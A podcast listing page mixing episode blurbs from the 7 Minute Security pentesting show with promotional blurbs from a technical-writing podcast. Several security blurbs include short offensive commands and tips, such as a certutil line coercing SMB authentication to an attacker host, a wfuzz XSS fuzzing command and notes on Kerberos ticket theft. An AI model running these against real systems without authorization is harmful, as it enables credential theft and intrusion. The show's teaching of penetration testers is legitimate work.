Gowri Ramkumar of Document360 finds and interviews the brightest minds in the SaaS documentation space.
…
continue reading
7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.
…
continue reading
1
7MS #633: How to Create a Security Knowledgebase with Docusaurus
14:16
14:16
Play later
Play later
Lists
Like
Liked
14:16
Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files inc…
…
continue reading
1
Exploring Use cases and Limitations of GenAI in Technical writing with Rene, Box
21:04
21:04
Play later
Play later
Lists
Like
Liked
21:04
Thank you for tuning in, we have an exciting offer for our listeners: Explore Document360 Partner Programs and unlock a wide range of benefits by becoming our partner today! Visit www.document360.com/partners today! Knowledgebase Ninjas is powered by Document360.By Gowri Ramkumar
…
continue reading
1
7MS #632: Tales of Pentest Pwnage – Part 59
48:09
48:09
Play later
Play later
Lists
Like
Liked
48:09
Today’s tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I’m not 100% sure …
…
continue reading
1
7MS #631: Tales of Pentest Pwnage – Part 58
15:57
15:57
Play later
Play later
Lists
Like
Liked
15:57
Hi friends, today’s a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud’homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot – find interesting files stored on (System Cent…
…
continue reading
1
7MS #630: Epic Road Trip Served with Security Sprinkles
45:27
45:27
Play later
Play later
Lists
Like
Liked
45:27
Today I recap a two week persona/biz road trip and talk about the security stuff that got sprinkled into it, including: Family members who don’t care about their personal security Weakpass – a cool collection of word lists for brute-forcing and spraying that I’d never heard of Working on two security Webinars for Netwrix (here’s part 1: Mastering P…
…
continue reading
1
7MS #629: Interview with Stu Musil of Ambient Consulting
46:23
46:23
Play later
Play later
Lists
Like
Liked
46:23
Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions: How do you properly vet a recruiter you don’t know, but who offers a job opportunity you’re i…
…
continue reading
1
7MS #628: How to Succeed in Business Without Really Crying – Part 17
9:36
9:36
Play later
Play later
Lists
Like
Liked
9:36
Hey friends, today we talk about some not-so-glamorous but ever-so-important stuff related to running a cybersecurity consultancy, including: Taking an inventory of all the SaaS stuff your business uses – to keep an eye on spending, know when services are expiring, and track which credit card the services are tied to (so the services don’t almost g…
…
continue reading
1
7MS #627: Migrating from vCenter to Proxmox – Part 2
35:36
35:36
Play later
Play later
Lists
Like
Liked
35:36
Hey friends, today we continue our series all about migrating from VMWare to the world Proxmox! Specifically: Getting my first Proxmox-based NUCs out in the field for live engagements! Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to to add Proxmox to those bare-metal…
…
continue reading
Hey friends, today we’ve got a security milkshake episode about Web app pentesting. Specifically we talk about: Burp Suite Enterprise Caido – a lightweight alternative to Burp wfuzz – Web fuzzer. Using a proxy:wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt –sc 200 “https://somedomain.com/shopping?&qty=%2FUZZ” -p 10.0.7.11:8080 KNOXSS…
…
continue reading
Thank you for tuning in, we have an exciting offer for our listeners: Explore Document360 Partner Programs and unlock a wide range of benefits by becoming our partner today! Visit www.document360.com/partners. Visit www.document360.com/partners Knowledgebase Ninjas is powered by Document360.By Gowri Ramkumar
…
continue reading
1
7MS #625: A Peek into the 7MS Mail Bag - Part 4
44:00
44:00
Play later
Play later
Lists
Like
Liked
44:00
Road trip time! I’ve been traveling this week doing some fun security projects, and thought all this highway time would be a perfect opportunity to take a dip into the 7MS mail bag! Today’s questions include: How do you price internal network penetration tests? Have you ever had to deal with a difficult client situation, and how did you resolve it?…
…
continue reading
1
7MS #624: Tales of Pentest Pwnage – Part 57
29:04
29:04
Play later
Play later
Lists
Like
Liked
29:04
Today’s tale of pentest pwnage is all about my new favorite attack called SPN-less RBCD. We did a teaser episode last week that actually ended up being a full episode all about the attack, and even step by step commands to pull it off. But I didn’t want today’s episode to just be “Hey friends, check out the YouTube version of this attack!” so I als…
…
continue reading
1
7MS #623: Prelude to a Tale of Pentest Pwnage
24:52
24:52
Play later
Play later
Lists
Like
Liked
24:52
Today’s prelude to a tale of pentest pwnage talks about something called “spnless RBCD” (resource-based constrained delegation). The show notes don't format well here in the podcast notes, so head to 7minsec.com to see the notes in all their glory.
…
continue reading
1
7MS #622: Migrating from vCenter to Proxmox - Part 1
16:31
16:31
Play later
Play later
Lists
Like
Liked
16:31
Sadly, the Broadcom acquisition of VMWare has hit 7MinSec hard – we love running ESXi on our NUCs, but ESXi free is no longer available. To add insult to injury, our vCenter lab at OVHcloud HQ got a huge price gouge (due to license cost increase; not OVH’s fault). Now we’re exploring Proxmox as an alternative hypervisor, so we’re using today’s epis…
…
continue reading
1
7MS #621: Eating the Security Dog Food - Part 6
23:37
23:37
Play later
Play later
Lists
Like
Liked
23:37
Today we revisit a series about eating the security dog food – in other words, practicing what we preach as security gurus! Specifically we talk about: We’re going to get a third-party assessment on 7MinSec (the business) Tips for secure email backup/storage Limiting the retention of sensitive data you store in cloud places…
…
continue reading
1
Docs-as-Code vs Dedicated knowledge base with Brianne Bennett, Opensee
13:43
13:43
Play later
Play later
Lists
Like
Liked
13:43
Thank you for tuning in, we have an exciting offer for our listeners: Explore Document360 Partner Programs and unlock a wide range of benefits by becoming our partner today! Visit www.document360.com/partners today! Knowledgebase Ninjas is powered by Document360.By Gowri Ramkumar
…
continue reading
1
7MS #620: Securing Your Mental Health - Part 5
22:54
22:54
Play later
Play later
Lists
Like
Liked
22:54
Today we’re talking about tips to deal with stress and anxiety: It sounds basic, but take breaks – and take them in a different place (don’t just stay in the office and do more screen/doom-scrolling) I’ve never gotten to a place in my workload where I go “Ahhh, all caught up!” so I should stop striving to hit that invisible goal. Chiropractic and b…
…
continue reading
We did something crazy today and recorded an episode that was 7 minutes long! Today we talk about some things that have helped us out in recent pentests: When using Farmer to create “trap” files that coerce authentication, I’ve found way better results using Windows Search Connectors (.searchConnector-ms) files This matrix of “can I relay this to t…
…
continue reading
1
7MS #618: Writing Savage Pentest Reports with Sysreptor
38:30
38:30
Play later
Play later
Lists
Like
Liked
38:30
Today’s episode is all about writing reports in Sysreptor. It’s awesome! Main takeaways: The price is free (they have a paid version as well)! You can send findings and artifacts directly to the report server using the reptor Python module Warning: Sysreptor only exports to PDF (no Word version option!) Sysreptor has helped us write reports faster …
…
continue reading
1
Improving documentation with user feedback with Iga Koprowska, Akamai
23:24
23:24
Play later
Play later
Lists
Like
Liked
23:24
Thank you for tuning in, we have an exciting offer for our listeners: Explore Document360 Partner Programs and unlock a wide range of benefits by becoming our partner. Visit www.document360.com/partners today! Knowledgebase Ninjas is powered by Document360.By Gowri Ramkumar
…
continue reading
1
7MS #617: Tales of Pentest Pwnage – Part 55
36:19
36:19
Play later
Play later
Lists
Like
Liked
36:19
Hey friends, today we’ve got a tale of pentest pwnage that covers: Passwords – make sure to look for patterns such as keyboard walks, as well as people who are picking passwords where the month the password changed is part of the password (say that five times fast)! Making sure you go after cached credentials Attacking SCCM – Misconfiguration Manag…
…
continue reading
1
7MS #616: Interview with Andrew Morris of GreyNoise
59:04
59:04
Play later
Play later
Lists
Like
Liked
59:04
Hey friends, today we have a super fun interview with Andrew Morris of GreyNoise to share. Andrew chatted with us about: Young Andrew’s early adventures in hacking his school’s infrastructure (note: don’t try this at home, kids!) Meeting a pentester for the first time, and getting his first pentesting job Spinning up a box on the internet, having i…
…
continue reading
1
7MS #615: Tales of Pentest Pwnage – Part 54
21:48
21:48
Play later
Play later
Lists
Like
Liked
21:48
Hey friends, sorry I’m so late with this (er, last) week’s episode but I’m back! Today is more of a prep for tales of pentest pwnage, but topics covered include: Make sure when you’re snafflin‘ that you check for encrypted/obfuscated logins and login strings – it might not be too tough to decrypt them! On the defensive side, I’ve found myself getti…
…
continue reading
1
Building developer-friendly API documentation with Hannah Kahn, Azion
10:37
10:37
Play later
Play later
Lists
Like
Liked
10:37
Thank you for tuning in, we have an exciting offer for our listeners: Explore Document360 Partner Programs and unlock a wide range of benefits by becoming our partner. Visit www.document360.com/partners today! Knowledgebase Ninjas is powered by Document360.By Gowri Ramkumar
…
continue reading
1
7MS #614: How to Succeed in Business Without Really Crying - Part 16
36:21
36:21
Play later
Play later
Lists
Like
Liked
36:21
How much fun I had attending and speaking at Netwrix Connect Being a sales guy in conference situations without being an annoying sales guy in conference situations A recap of the talk I co-presented about high profile breaches and lessons we can learn from them
…
continue reading
1
7MS #613: Tales of Pentest Pwnage – Part 53
33:24
33:24
Play later
Play later
Lists
Like
Liked
33:24
Today’s tale of pentest covers: Farming for credentials (don’t forget to understand trusted zones to make this happen properly!) Snaffling for juice file shares Stealing Kerberos tickets with Rubeus
…
continue reading
Hello friends, we’re still deep in the podcast trenches this quarter and wanted to share some nuggets of cool stuff we’ve been learning along the way: Snaffler – pairs nicely with PowerHuntShares to find juicy tidbits within file/folder shares Group3r – helps you find interesting and potentially abusable Group Policy Object configurations Farmer – …
…
continue reading
Hey friends, sorry for the late episode but I've been deep in the trenches of pentest adventures. I'll do a more formal tale of pentest pwnage when I come up for air, but for now I wanted to share some tips I've picked up from recent engagements: GraphRunner - awesome PowerShell toolkit for interacting with Microsoft Graph API. From a pentesting pe…
…
continue reading
1
Migrating documentation: Best practices and challenges, with David Ingram, Medallia
23:39
23:39
Play later
Play later
Lists
Like
Liked
23:39
If you enjoyed this episode, please - Subscribe and rate us on Apple Podcasts Follow us on Spotify Join our exclusive technical writer community here. Knowledgebase Ninjas is powered by Document360.By Gowri Ramkumar
…
continue reading
1
7MS #610: DIY Pentest Dropbox Tips – Part 9
20:25
20:25
Play later
Play later
Lists
Like
Liked
20:25
Hey friends, today we cover a funstrating (that's fun + frustrating) issue we had with our DIY pentest dropboxes. TLDL: The preseed file got jacked because I had a bad Kali metapackage in it. While I was tinkering around with preseed files, I decided it would be more efficient to have the Kali ISO call that preseed file directly over HTTP (rather t…
…
continue reading
Hey friends, today is a first impressions episode about Sysreptor, which according to their GitHub page, is a fully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. It is easy to stand up with Docker, has built-in MFA and a great hybrid WYSIWYG/code editor. The only sc…
…
continue reading
1
The Changing Landscape of Technical Writing with Mick Davidson, Aussie Broadband
23:54
23:54
Play later
Play later
Lists
Like
Liked
23:54
If you enjoyed this episode, please - Subscribe and rate us on Apple Podcasts Follow us on Spotify Join our exclusive technical writer community here. Knowledgebase Ninjas is powered by Document360.By Gowri Ramkumar
…
continue reading
1
7MS #608: New Tool Release - EvilFortiAuthenticator
43:46
43:46
Play later
Play later
Lists
Like
Liked
43:46
Hey friends, today our pal Hackernovice joins us for a tool (actually two tools!) release party: EvilFortiAuthenticator - it's like a regular FortiAuthenticator, but evil. This tool allows you to capture the FortiAuthenticator API and subsequently steal the entire device's config, subsequently allowing you to restore the config to a second server a…
…
continue reading
1
7MS #607: How to Succeed in Business Without Really Crying - Part 15
39:54
39:54
Play later
Play later
Lists
Like
Liked
39:54
Today we talk about some business-y things like: A pre first impressions opinion on Sysreptor Why I'm not worried about AI replacing manual pentesting (yet) My struggle with going "full CEO" vs. staying in the weeds and working on hands-on security projects
…
continue reading
1
7MS #606: Hacking OWASP Juice Shop (2024 edition)
29:51
29:51
Play later
Play later
Lists
Like
Liked
29:51
Today our pals Bjorn Kimminich from OWASP and Paul from Project7 and TheUnstoppables.ai join us as we kick off a series all about hacking the OWASP Juice Shop, which is "probably the most modern and sophisticated insecure web application!" We got a few wins on the Juice Shop score board today: Found the score board Bullied the chatbot Fired a DOM X…
…
continue reading
1
7MS #605: Navigating the Demands of Tech Leadership with Amanda Berlin of Blumira
58:01
58:01
Play later
Play later
Lists
Like
Liked
58:01
Today our friend Amanda Berlin, Lead Incident Detection Engineer at Blumira, joins us to talk about being more mentally healthy in 2024! P.S. - did you miss Amanda's past visits to the program? Then check out episode 518, 536 and 588. Be sure to check out the next edition of Amanda's Defensive Security Handbook when it comes out in later January, 2…
…
continue reading
Today we tease two upcoming tool releases (shooting for Q1, 2024): TCMLobbyBBQ - a Python script for PC players of The Texas Chain Saw Massacre game to help players get out of lobbies and into live games ASAP! The script uses PyAutoGUI to take screenshots of what part of the game you're in, then make appropriate key presses and mouse clicks to get …
…
continue reading
1
Knowledge Management for Organizational Success with Eduarda Raddatz, Technical Writer, Matera
15:48
15:48
Play later
Play later
Lists
Like
Liked
15:48
If you enjoyed this episode, please - Subscribe and rate us on Apple Podcasts Follow us on Spotify Join our exclusive technical writer community here. Knowledgebase Ninjas is powered by Document360.By Gowri Ramkumar
…
continue reading
1
7MS #603: Monitoring Your Tailscale Network with Uptime Kuma
28:22
28:22
Play later
Play later
Lists
Like
Liked
28:22
Today I look at potentially replacing Splashtop and UptimeRobot (check out our episode about it here) with Tailscale and Uptime Kuma. The missing link (which I'd love some help with) is answering this security question: how can I setup Tailscale so that my 7MinSec testing box can connect to all these NUCs spread around the globe, but those NUCs can…
…
continue reading
1
7MS #602: How to Succeed in Business Without Really Crying - Part 14
44:35
44:35
Play later
Play later
Lists
Like
Liked
44:35
Today we're talkin' business! Specifically: How to (gently) say "no" to (some) client projects How to (politely) challenge end-of-year deadlines An idea I'm kicking around in the lab - where I might do away with UptimeRobot and Splashtop in favor of Tailscale and Uptime Kuma
…
continue reading
1
7MS #601: Breaking Up With Active Directory
27:54
27:54
Play later
Play later
Lists
Like
Liked
27:54
Today our pal Nate Schmitt (you may remember him from his excellent Dealing with Rejection: A DMARC Discussion Webinar) joins us to talk about breaking up with Active Directory. He covers: Why would you want to consider removing AD from your environment? What are common items to plan for? What steps should you take to efficiently plan a migration? …
…
continue reading
1
7MS #600: First Impressions of Using AI on Penetration Tests
22:39
22:39
Play later
Play later
Lists
Like
Liked
22:39
Hey friends, today I share my experience working with ChatGPT, Ollama.ai, PentestGPT and privateGPT to help me pentest Active Directory, as well as a machine called Pilgrimage from HackTheBox. Will AI replace pentesters as we know them today? In my humble opinion: not quite yet. Check out today's episode to hear more, and please join me on Wednesda…
…
continue reading
1
Crafting quality product documentation with Sofia Emelianova, Senior Technical Writer, Google
14:28
14:28
Play later
Play later
Lists
Like
Liked
14:28
If you enjoyed this episode, please - Subscribe and rate us on Apple Podcasts Follow us on Spotify Join our exclusive technical writer community here. Knowledgebase Ninjas is powered by Document360.By Gowri Ramkumar
…
continue reading
1
7MS #599: Baby's First Responsible Disclosure
38:36
38:36
Play later
Play later
Lists
Like
Liked
38:36
Today we talk about our first experience working through the responsible disclosure process after finding vulnerabilities in a security product. We cannot share a whole lot of details as of right now, but wanted to give you some insight into the testing/reporting process thus far, which includes the use of: BulletsPassView MITMsmtp mitmproxy…
…
continue reading
Today our good buddy Paul and I keep trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2 and 3). In today's final chapter, Paul and I: Find Eric's secret SSH back door Locate and decrypt a hidden file with Billy's homework Build wordlists with cewl Save Billy from the evil clutches of Eric Gordon!!!…
…
continue reading
1
7MS #597: Let's JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy) with Robert McCurdy
32:40
32:40
Play later
Play later
Lists
Like
Liked
32:40
Today we had a blast talking with Robert McCurdy about JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy)! JAMBOREE allows you to quickly spin up a portable Git/Python/Java environment and much more! From a pentesting POV, you can whip up an Android pentesting environment, BloodHound/SharpHound combo, Burp Suite...the list goes on!…
…
continue reading
1
7MS #596: How to Succeed in Business Without Really Crying - Part 13
31:07
31:07
Play later
Play later
Lists
Like
Liked
31:07
After about a year break (last edition of this series was in October, 2022, we're back with an updated episode of How to Succeed in Business Without Really Crying. We cover: Why we're not planning on selling the business any time soon Fast Google Dorks Scan Using ProtonVPN via command line Our pre first impressions of a pentesting SaaS tool you've …
…
continue reading
1
7MS #595: Choosing the Right XDR Strategy with Matt Warner of Blumira
1:03:09
1:03:09
Play later
Play later
Lists
Like
Liked
1:03:09
Today we're joined by Matt Warner of Blumira (remember him from episodes #551 and #529 and #507?) to talk about choosing the right XDR strategy! There's a lot to unpack here. Are EDR, MDR and XDR related? Can you get them all from one vendor - and should you? Do you run them on-prem, in the cloud, or both? Join us as Matt answers these questions an…
…
continue reading
1
7MS #594: Using PatchMyPC to Auto-Update Pentest Dropboxes
29:49
29:49
Play later
Play later
Lists
Like
Liked
29:49
Today we're talking about how you can use PatchMyPc to keep your home PC and/or pentest dropbox automatically updated with the latest/greatest patches!
…
continue reading
Hey friends, today my Paul and I kept trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2). In our journey we learned some good stuff: Port knocking is awesome using utilities like knock: /opt/knock/knock 10.0.7.124 1466 67 1469 1514 1981 1986 Sending emails via command line is made (fairly) easy with swaks: swaks …
…
continue reading